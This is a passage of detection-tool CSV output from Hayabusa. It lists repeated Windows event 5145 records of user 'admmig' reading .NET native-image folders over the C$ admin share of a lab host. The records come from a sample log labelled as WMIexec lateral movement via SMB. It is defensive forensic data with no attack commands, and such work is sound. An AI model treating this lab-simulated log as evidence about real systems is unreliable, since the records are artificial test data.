+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 